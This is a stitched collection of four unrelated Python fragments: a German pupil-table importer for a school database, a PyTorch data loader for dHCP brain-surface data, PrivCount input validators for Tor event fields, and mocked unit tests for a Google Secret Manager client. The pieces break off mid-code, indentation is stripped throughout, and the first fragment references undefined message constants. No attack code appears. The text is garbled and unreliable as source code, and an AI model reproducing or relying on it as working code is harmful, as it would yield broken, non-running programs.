_NOUPDATES = "Keine Änderungen in der Schülertabelle für Schuljahr {year}"
_REBUILDPUPILS = "Schülertabelle für Schuljahr {year} wird aktualisiert"
_NEWPUPILS = "Neue Schüler in Klasse {klass}:\n {pids}"
_PUPILCHANGES = "Änderungen in Klasse {klass}:\n {data}"
_OLDPUPILS = "Abmeldungen in Klasse {klass}:\n {pids}"
_DB_FIELD_MISSING = "PUPILS-Tabelle ohne Feld {field}"
_DB_FIELD_LOST = "PUPILS-Tabelle: Feld {field} wird nicht exportiert"
_IMPORT_FROM = "Importiere Schüler von Datei:\n {path}"
_BADCLASSNAME = "Ungülitige Klassenname: {name}"
_BAD_DATE = "Ungültiges Datum: Feld {tag}, Wert {val} in:\n {path}"
# Info tag in spreadsheet table
_SCHOOLYEAR = "Schuljahr"
# Spreadsheet configuration
_PUPIL_TABLE_TITLE = "** Schüler **"
import os, datetime
from collections import OrderedDict, UserDict
from glob import glob
from wz_core.configuration import Dates, Paths
from wz_core.db import DB
# To read/write spreadsheet tables:
from wz_table.dbtable import readDBTable, makeDBTable
def _getFieldmap ():
fmap = OrderedDict ()
for f, val in CONF.TABLES.PUPILS_FIELDNAMES.items ():
fmap [f] = val.upper ()
return fmap
# In dutch there is a word for those little lastname prefixes like "von",
# "zu", "van" "de": "tussenvoegsel". For sorting purposes these can be a
# bit annoying because they are often ignored, e.g. "<NAME>" would be
# sorted under "G".
####++++++++++++++++++++++++++++++++++++++++++++++++####
#### A surname splitter. This version regards the first capital letter as
#### the start of the name for sorting purposes. Thus o'Brien is seen as
#### ["o'", "Brien"], but O'Brien is seen as ["O'Brien"]!
#### To handle confusing cases, a manual (re)ordering should be possible.
#def usplit (name):
# i = 0
# for c in name:
# if c.isupper():
# if i == 0: return None, name
# if name [i-1] == ' ':
# return name [:i-1], name [i:]
# else:
# return name [:i], name [i:]
# i += 1
# print ('???', name)
# return None
#print (' -->', usplit ('<NAME>'))
#print (' -->', usplit ('<NAME>'))
#print (' -->', usplit ("o'Riordan"))
#print (' -->', usplit ("O'Riordan"))
####------------------------------------------------####
# This is a custom name splitter for raw data which has the lastname
# prefixes at the end of the firstname(s). It uses a look-up table of
# prefix "words".
def tvSplitF (name):
"""Split a "tussenvoegsel" from the end of the first names.
Return a tuple: (Actual first names, tussenvoegsel or <None>).
"""
tvlist = list (CONF.MISC.TUSSENVOEGSEL)
ns = name.split ()
if len (ns) >= 1:
tv = []
i = 0
for s in reversed (ns):
if s in tvlist:
tv.insert (0, s)
i -= 1
else:
break
if i < 0:
return (" ".join (ns [:i]), " ".join (tv))
return (" ".join (ns), None) # ensure normalized spacing
class _IndexedDict (list):
"""A list which allows keyed access to its fields.
As the fields are a class attribute, this class can only be used for
one type of list. Here it is used for the fields of the raw pupil data.
Before instantiating, <setup> must be called to set up the field
names and indexes.
"""
_fields = None
@classmethod
def setup (cls, fields):
if cls._fields == None:
cls._fields = {}
i = 0
for f in fields:
cls._fields [f] = i
i += 1
#### The main part of the class, dealing with instances:
def __init__ (self, values):
if len (values) != len (self._fields):
REPORT.Fail (_WRONGLENGTH, fields=repr (self._fields),
values=repr (values))
super ().__init__ (values)
def __getitem__ (self, key):
if type (key) == str:
return super (). __getitem__ (self._fields [key])
else:
return super (). __getitem__ (key)
def __setitem__ (self, key, value):
if type (key) == str:
return super (). __setitem__ (self._fields [key], value)
else:
return super (). __setitem__ (key, value)
def readRawPupils (schoolyear, filepath):
"""Read in a table containing raw pupil data for the whole school
from the given file (ods or xlsx, the file ending can be omitted).
The names of date fields are expected to end with '_D'. Values are
accepted in isoformat (YYYY-MM-DD, or %Y-%m-%d for <datetime>) or
in the format specified for output, config value FORMATTING.DATEFORMAT.
If a pupil left the school before the beginning of the school year
(s)he will be excluded from the list built here.
Build a mapping:
{classname -> ordered list of <_IndexedDict> instances}
The ordering of the pupil data is determined by the config file
TABLES/PUPILS_FIELDNAMES.
The fields supplied in the raw data are saved as the <fields>
attribute of the result.
"""
startdate = Dates.day1 (schoolyear)
# An exception is raised if there is no file:
table = readDBTable (filepath)
# Get ordered field list for the table.
# The config file has: internal name -> table name.
# All names are converted to upper case to enable case-free matching.
fieldMap = _getFieldmap ()
# Build a list of the field names which are used
fields = OrderedDict ()
colmap = []
# Read the (capitalised) column headers from this line
h_colix = {h.upper (): colix
for h, colix in table.headers.items ()}
datefields = []
for f, fx in fieldMap.items ():
try:
colmap.append (h_colix [fx])
fields [f] = fx
if f.endswith ('_D'):
datefields.append (f)
except:
# Field not present in raw data
if f == 'PSORT':
fields [f] = fx
colmap.append (None)
else:
REPORT.Warn (_FIELDMISSING, field=f, path=filepath)
### For sorting: use a translation table for non-ASCII characters
ttable = str.maketrans (dict (CONF.ASCII_SUB))
classes = UserDict () # for the results: {class -> [row item]}
classes.fields = fields
### Read the row data
ntuples = {}
_IndexedDict.setup (fields)
dateformat = CONF.FORMATTING.DATEFORMAT
for row in table:
rowdata = []
for col in colmap:
rowdata.append (None if col == None else row [col])
pdata = _IndexedDict (rowdata)
# Check date fields
for f in datefields:
val = pdata [f]
if val:
try:
datetime.date.fromisoformat (val)
except:
try:
pdata [f] = datetime.datetime.strptime (val,
dateformat).date ().isoformat ()
except:
REPORT.Fail (_BAD_DATE, tag=f, val=val, path=filepath)
## Exclude pupils who left before the start of the schoolyear
if pdata ['EXIT_D'] and pdata ['EXIT_D'] < startdate:
continue
## Name fixing
firstnames, tv = tvSplitF (pdata ['FIRSTNAMES'])
lastname = pdata ['LASTNAME']
firstname = tvSplitF (pdata ['FIRSTNAME']) [0]
if tv:
sortname = lastname + ' ' + tv + ' ' + firstname
pdata ['FIRSTNAMES'] = firstnames
pdata ['FIRSTNAME'] = firstname
pdata ['LASTNAME'] = tv + ' ' + lastname
else:
sortname = lastname + ' ' + firstname
pdata ['PSORT'] = sortname.translate (ttable)
klass = pdata ['CLASS']
# Normalize class name
try:
if not klass [0].isdigit ():
raise NameError
if len (klass) == 1:
k = '0' + klass
pdata ['CLASS'] = k
else:
if klass [1].isdigit ():
k = klass
else:
k = '0' + klass
pdata ['CLASS'] = klass
k = klass if klass [1].isdigit () else '0' + klass
if not (len (k) == 2 or k [2:].isalpha ()):
raise NameError
except:
REPORT.Fail (_BADCLASSNAME, name=klass)
try:
classes [k].append (pdata)
except:
classes [k] = [pdata]
for klass in classes:
# alphabetical sorting
classes [klass].sort (key=lambda pd: pd ['PSORT'])
return classes
def updateFromRaw (schoolyear, rawdata):
"""Update the PUPILS table from the supplied raw pupil data.
Only the fields supplied in the raw data will be affected.
If there is no PUPILS table, create it, leaving fields for which no
data is supplied | |
<filename>data_utils/MyDataLoader.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 13:38:48 2020
@author: fa19
"""
import nibabel as nb
import numpy as np
import torch
import random
from scipy.interpolate import griddata
import os
means_birth_age = torch.Tensor([1.18443463, 0.0348339 , 1.02189593, 0.12738451])
stds_birth_age = torch.Tensor([0.39520042, 0.19205919, 0.37749157, 4.16265044])
means_birth_age_confounded = means_birth_age
stds_birth_age_confounded = stds_birth_age
means_scan_age = torch.Tensor([1.16332048, 0.03618059, 1.01341462, 0.09550486])
stds_scan_age = torch.Tensor([0.39418309, 0.18946538, 0.37818974, 4.04483381])
means_bayley = torch.Tensor([0.03561912, 0.1779468, 1.02368241, 1.30365072, 1.42005161, 1.80373678, 1.0485854, 1.44855442, 0.74604417])
stds_bayley = torch.Tensor([0.19094736, 4.11706815, 0.37789417, 4.61303946, 5.08495779, 4.94774891, 4.72248912, 4.22112396, 4.48455344])
means = torch.Tensor([1.1267, 0.0345, 1.0176, 0.0556])
stds = torch.Tensor([0.3522, 0.1906, 0.3844, 4.0476])
means = means
stds = stds
rotation_arr = np.load('data/rotations_array.npy').astype(int)
reversing_arr = np.load('data/reversing_arr.npy')
test_rotation_arr = np.load('data/remaining_rotations_array.npy').astype(int)
xy_points = np.load('data/equirectangular_ico_6_points.npy')
xy_points[:,0] = (xy_points[:,0] + 0.1)%1
grid = np.load('data/grid_170_square.npy')
grid_x, grid_y = np.meshgrid(np.linspace(0.02, 0.98, 170), np.linspace(0.02, 0.98, 170))
grid[:,0] = grid_x.flatten()
grid[:,1] = grid_y.flatten()
from scipy.interpolate import griddata
from torch_geometric.data import Data
class My_dHCP_Data(torch.utils.data.Dataset):
def __init__(self, input_arr, warped_files_directory, unwarped_files_directory, rotations = False,
number_of_warps = 0, parity_choice = 'left', smoothing = False, normalisation = None, projected =False, sample_only = True, output_as_torch = True, *args):
"""
A Full Dataset for the dHCP Data. Can include warps, rotations and parity flips.
Fileanme style:
in the array: only 'sub-X-ses-Y'
but for the filenames themselves
Left = 'sub-X_ses-Y_L'
Right = 'sub-X_ses-Y_R'
if warped:
'sub-X_ses-Y_L_W1'
INPUT ARGS:
1. input_arr:
Numpy array size Nx2
FIRST index MUST be the filename (excluding directory AND L or R ) of MERGED nibabel files
LAST index must be the (float) label
(OPTIONAL) Middle index if size 3 (optional) is any confounding metadata (Also float, e.g scan age for predicting birth age)
2 . rotations - boolean: to add rotations or not to add rotations
3. number of warps to include - INT
NB WARPED AR INCLUDED AS FILENAME CHANGES. WARP NUMBER X IS WRITTEN AS filename_WX
NUMBER OF WARPS CANNOT EXCEED NUMBER OF WARPES PRESENT IN FILES
4. Particy Choice (JMPORTANT!) - defines left and right-ness
If: 'left'- will output ONLY LEFT
If: 'both' - will randomly choose L or R
If 'combined' - will output a combined array (left first), will be eventually read as a file with twice the number of input channels. as they will be stacked together
5. smoothing - boolean, will clip extremal values according to the smoothing_array
6. normalisation - str. Will normalise according to 'range', 'std' or 'None'
Range is from -1 to 1
Std is mean = 0, std = 1
7. output_as_torch - boolean:
outputs values as torch Tensors if you want (usually yes)
"""
self.input_arr = input_arr
self.image_files = input_arr[:,0]
self.label = input_arr[:,-1]
self.rotations = rotations
self.projected = projected
self.number_of_warps = number_of_warps
self.parity = parity_choice
self.smoothing = smoothing
self.normalisation = normalisation
self.sample_only = sample_only
self.output_as_torch = output_as_torch
if self.number_of_warps != 0 and self.number_of_warps != None:
self.directory = warped_files_directory
else:
self.directory = unwarped_files_directory
def __len__(self):
L = len(self.input_arr)
if self.number_of_warps !=0:
if self.sample_only == False:
L = L*self.number_of_warps
if self.parity == 'both':
L = 2* L
return L
def __test_input_params__(self):
assert self.input_arr.shape[1] >=2, 'check your input array is a nunpy array of files and labels'
assert type(self.number_of_warps) == int, "number of warps must be an in integer (can be 0)"
assert self.parity in ['left', 'both', 'combined'], "parity choice must be either left, combined or both"
if self.number_of_rotations != 0:
assert self.rotation_arr != None,'Must specify a rotation file containing rotation vertex ids if rotations are non-zero'
assert self.rotations == bool, 'rotations must be boolean'
assert self.normalisation in [None, 'none', 'std', 'range'], 'Normalisation must be either std or range'
def __genfilename__(self,idx, right):
"""
gets the appropriate file based on input parameters on PARITY and on WARPS
"""
# grab raw filename
raw_filename = self.image_files[idx]
# add parity to it. IN THE FORM OF A LIST! If requries both will output a list of length 2
filename = []
if self.parity != 'combined':
if right == True:
filename.append(raw_filename + '_R')
else:
filename.append(raw_filename + '_L')
# if self.parity == 'left':
# filename.append(raw_filename + '_L')
#
# elif self.parity == 'both':
# coin_flip = random.randint(0,1)
# if coin_flip == 0:
# filename.append(raw_filename + '_L')
# elif coin_flip == 1:
# filename.append(raw_filename + '_R')
# right = True
if self.parity == 'combined':
filename.append(raw_filename + '_L')
filename.append(raw_filename+'_R')
# filename is now a list of the correct filenames.
# now add warps if required
if self.number_of_warps != 0:
warp_choice = str(random.randint(0,self.number_of_warps))
if warp_choice !='0':
filename = [s + '_W'+warp_choice for s in filename ]
return filename
def __getitem__(self, idx):
"""
First load the images and collect them as numpy arrays
then collect the label
then collect the metadata (though might be None)
"""
if self.parity == 'both':
T = self.__len__()//2
idx, right = idx % T, idx // T
filename = self.__genfilename__(idx, right)
else:
right = False
filename = self.__genfilename__(idx, right)
image_gifti = [nb.load(self.directory + '/'+individual_filename+'.shape.gii').darrays for individual_filename in filename]
image = []
if self.rotations == True:
rotation_choice = random.randint(0, len(rotation_arr)-1)
if rotation_choice !=0:
for file in image_gifti:
image.extend(item.data[rotation_arr[rotation_choice]] for item in file)
else:
for file in image_gifti:
image.extend(item.data for item in file)
else:
for file in image_gifti:
image.extend(item.data for item in file)
if right == True:
image = [item[reversing_arr] for item in image]
### labels
# if self.number_of_warps != 0:
#
# idx = idx%len(self.input_arr)
# label = self.label[idx]
###### metadata grabbing if necessary
label = self.label[idx]
if self.input_arr.shape[1] > 2:
self.metadata = self.input_arr[:,1:-1]
metadata = self.metadata[idx]
else:
metadata = None
if self.smoothing != False:
for i in range(len(image)):
image[i] = np.clip(image[i], lower_bound[i%len(lower_bound)].item(), upper_bound[i%len(upper_bound)].item())
# torchify if required:
if self.normalisation != None:
if self.normalisation == 'std':
for i in range(len(image)):
image[i] = ( image[i] - means[i%len(means)].item( )) / stds[i%len(stds)].item()
elif self.normalisation == 'range':
for i in range(len(image)):
image[i] = image[i] - minima[i%len(minima)].item()
image[i] = image[i] / (maxima[i%len(maxima)].item()- minima[i%len(minima)].item())
if self.output_as_torch:
image = torch.Tensor( image )
label = torch.Tensor( [label] )
if isinstance(metadata,np.ndarray):
metadata = torch.Tensor( [metadata] ).squeeze(1)
if self.projected == True:
image = griddata(xy_points, image.T, grid, 'nearest')
image = torch.Tensor(image.reshape(170,170,4)).permute(2,0,1)
if hasattr(metadata,'shape'):
sample = {'image': image, 'metadata' : metadata, 'label': label}
else:
sample = {'image': image,'label': label}
return sample
class My_dHCP_Data_Test_Rot(torch.utils.data.Dataset):
def __init__(self, input_arr, warped_files_directory, unwarped_files_directory, rotations = False,
number_of_warps = 0, parity_choice = 'left', smoothing = False, normalisation = None, projected =False, sample_only = True, output_as_torch = True, *args):
"""
A Full Dataset for the dHCP Data. Can include warps, rotations and parity flips.
Fileanme style:
in the array: only 'sub-X-ses-Y'
but for the filenames themselves
Left = 'sub-X_ses-Y_L'
Right = 'sub-X_ses-Y_R'
if warped:
'sub-X_ses-Y_L_W1'
INPUT ARGS:
1. input_arr:
Numpy array size Nx2
FIRST index MUST be the filename (excluding directory AND L or R ) of MERGED nibabel files
LAST index must be the (float) label
(OPTIONAL) Middle index if size 3 (optional) is any confounding metadata (Also float, e.g scan age for predicting birth age)
2 . rotations - boolean: to add rotations or not to add rotations
3. number of warps to include - INT
NB WARPED AR INCLUDED AS FILENAME CHANGES. WARP NUMBER X IS WRITTEN AS filename_WX
NUMBER OF WARPS CANNOT EXCEED NUMBER OF WARPES PRESENT IN FILES
4. Particy Choice (JMPORTANT!) - defines left and right-ness
If: 'left'- will output ONLY LEFT
If: 'both' - will randomly choose L or R
If 'combined' - will output a combined array (left first), will be eventually read as a file with twice the number of input channels. as they will | |
<gh_stars>10-100
'''
Created on Jun 14, 2017
@author: teor
See LICENSE for licensing information
'''
import logging
from privcount.config import validate_ip_address
from privcount.log import summarise_string
def parse_tagged_event(event_field_list):
'''
Parse event_field_list from an event with tagged fields.
Each tagged field in event_field_list is a 'Key=Value' pair.
A specification for the tagged event format is in doc/TorEvents.markdown
The list must not include the event code (650) or event type (PRIVCOUNT_*).
Returns a dictionary of Key: Value pairs, where Key and Value are both
strings. (To retrieve typed values, use the is_type_valid and
get_type_value functions.)
Key must be at least one character, and '=' must be present, or the event
is malformed.
If there is no Value after the '=', result[Key] is a zero-length string.
If any field is not in the correct format, returns an empty dictionary.
'''
result = dict()
for field in event_field_list:
# validate the field
# tolerate multiple spaces between fields
if len(field) == 0:
logging.warning("Ignoring empty tagged event field")
continue
# fields must not contain whitespace or C NULs
if ' ' in field or '\r' in field or '\n' in field or '\0' in field:
logging.warning("Ignoring tagged event with malformed whitespace: '{}'"
.format(field))
return dict()
# split the field
key, eq, value = field.partition("=")
# validate the key, eq, and value
# values must not contain =
if '=' in value:
logging.warning("Ignoring tagged event with multiple separators: '{}'"
.format(field))
return dict()
# the key and the '=' must be present
if len(eq) != 1:
logging.warning("Ignoring tagged event with missing or malformed '=': '{}'"
.format(field))
return dict()
if len(key) == 0:
logging.warning("Ignoring tagged event with missing key: '{}'"
.format(field))
return dict()
# the list can't have duplicate keys
if key in result:
logging.warning("Ignoring tagged event with duplicate key: '{}'"
.format(field))
return dict()
result[key] = value
return result
def is_field_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
If is_mandatory is True, check that fields[field_name] exists.
If it is missing, return False and log a warning using event_desc.
Otherwise, return True (the event should be processed).
'''
if is_mandatory and field_name not in fields:
logging.warning("Rejected missing {} {}"
.format(field_name, event_desc))
return False
return True
def is_string_valid(field_name, fields, event_desc,
is_mandatory=False,
min_len=None, max_len=None):
'''
Check that fields[field_name] passes is_field_valid() and has a length
between min_len and max_len (inclusive). Use None for no length check.
Don't pass floating-point values for min_len and max_len: they can be
inaccurate when compared with integer lengths.
If any check fails, return False (the event is ignored), and log a
warning using event_desc.
Otherwise, return True (the event should be processed).
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing other fields
return True
field_value = fields[field_name]
field_len = len(field_value)
field_value_summary = summarise_string(field_value)
if min_len is not None and field_len < min_len:
logging.warning("Ignored {} length {}: '{}', must be at least {} characters {}"
.format(field_name, field_len, field_value_summary,
min_len, event_desc))
logging.debug("Ignored {} length {} (full string): '{}', must be at least {} characters {}"
.format(field_name, field_len, field_value,
min_len, event_desc))
# we can't process it
return False
if max_len is not None and field_len > max_len:
logging.warning("Ignored {} length {}: '{}', must be at most {} characters {}"
.format(field_name, field_len, field_value_summary,
max_len, event_desc))
logging.debug("Ignored {} length {} (full string): '{}', must be at most {} characters {}"
.format(field_name, field_len, field_value,
max_len, event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_list_valid(field_name, fields, event_desc,
is_mandatory=False,
min_count=None, max_count=None):
'''
Check that fields[field_name] passes is_field_valid(), and has between
min_count and max_count elements (inclusive). Use None for no count check.
Assumes a zero-length value is a list with no items.
Don't pass floating-point values for min_count and max_count: they can
be inaccurate when compared with integer counts.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
field_value = fields[field_name]
field_value_summary = summarise_string(field_value)
# Assume a zero-length value is a list with no items
if len(field_value) > 0:
list_count = field_value.count(',') + 1
else:
list_count = 0
if min_count is not None and list_count < min_count:
logging.warning("Ignored {} '{}', must have at least {} items {}"
.format(field_name, field_value_summary, min_count,
event_desc))
logging.debug("Ignored {} (full list) '{}', must have at least {} items {}"
.format(field_name, field_value, min_count,
event_desc))
# we can't process it
return False
if max_count is not None and list_count > max_count:
logging.warning("Ignored {} '{}', must have at most {} items {}"
.format(field_name, field_value_summary, max_count,
event_desc))
logging.debug("Ignored {} (full list) '{}', must have at most {} items {}"
.format(field_name, field_value, max_count,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_int_valid(field_name, fields, event_desc,
is_mandatory=False,
min_value=None, max_value=None):
'''
Check that fields[field_name] passes is_field_valid(), is a valid int,
and is between min_value and max_value (inclusive). Use None for no
range check.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
try:
field_value = int(fields[field_name])
except ValueError as e:
# not an integer
logging.warning("Ignored {} '{}', must be an integer: '{}' {}"
.format(field_name, fields[field_name], e,
event_desc))
return False
if min_value is not None and field_value < min_value:
logging.warning("Ignored {} '{}', must be at least {} {}"
.format(field_name, field_value, min_value,
event_desc))
# we can't process it
return False
if max_value is not None and field_value > max_value:
logging.warning("Ignored {} '{}', must be at most {} {}"
.format(field_name, field_value, max_value,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_flag_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
Check that fields[field_name] passes is_field_valid() and is 0 or 1.
See is_int_valid for details.
'''
return is_int_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory,
min_value=0,
max_value=1)
def is_float_valid(field_name, fields, event_desc,
is_mandatory=False,
min_value=None, max_value=None):
'''
Check that fields[field_name] passes is_field_valid(), is a valid
float (includes integral values), and is between min_value and
max_value (inclusive). Use None for no range check.
Floating-point values can be inaccurate when compared: if you want equal
values to be included, use a slightly larger range. Don't use Inf to skip
a range check, it may not do what you want. None is much more reliable.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
try:
field_value = float(fields[field_name])
except ValueError as e:
# not a float
logging.warning("Ignored {} '{}', must be a float: '{}' {}"
.format(field_name, fields[field_name], e,
event_desc))
return False
if min_value is not None and field_value < min_value:
logging.warning("Ignored {} '{}', must be at least {} {}"
.format(field_name, field_value, min_value,
event_desc))
# we can't process it
return False
if max_value is not None and field_value > max_value:
logging.warning("Ignored {} '{}', must be at most {} {}"
.format(field_name, field_value, max_value,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_ip_address_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
Check that fields[field_name] passes is_field_valid(), and is a valid
IPv4 or IPv6 address.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
field_value = validate_ip_address(fields[field_name])
if field_value is None:
# not an IP address
logging.warning("Ignored {} '{}', must be an IP address {}"
.format(field_name, fields[field_name], event_desc))
return False
# it is valid and we want to keep on processing
return True
def get_string_value(field_name, fields, event_desc,
is_mandatory=False,
default=None):
'''
Check that fields[field_name] exists.
Asserts if is_mandatory is True and it does not exist.
If it does exist, return it as a string.
If it is missing, return default.
(There are | |
gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
call.return_value = resources.Secret()
client.update_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "secret.name=secret.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_secret_field_headers_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.UpdateSecretRequest()
request.secret.name = "secret.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Secret())
await client.update_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "secret.name=secret.name/value",) in kw["metadata"]
def test_update_secret_flattened():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = resources.Secret()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_secret(
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].secret
mock_val = resources.Secret(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_secret_flattened_error():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_secret(
service.UpdateSecretRequest(),
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_secret_flattened_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = resources.Secret()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Secret())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_secret(
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].secret
mock_val = resources.Secret(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_secret_flattened_error_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_secret(
service.UpdateSecretRequest(),
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize("request_type", [service.DeleteSecretRequest, dict,])
def test_delete_secret(request_type, transport: str = "grpc"):
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_secret_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
client.delete_secret()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
@pytest.mark.asyncio
async def test_delete_secret_async(
transport: str = "grpc_asyncio", request_type=service.DeleteSecretRequest
):
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_secret_async_from_dict():
await test_delete_secret_async(request_type=dict)
def test_delete_secret_field_headers():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.DeleteSecretRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
call.return_value = None
client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_secret_field_headers_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.DeleteSecretRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_secret_flattened():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_secret(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_secret_flattened_error():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_secret(
service.DeleteSecretRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_secret_flattened_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
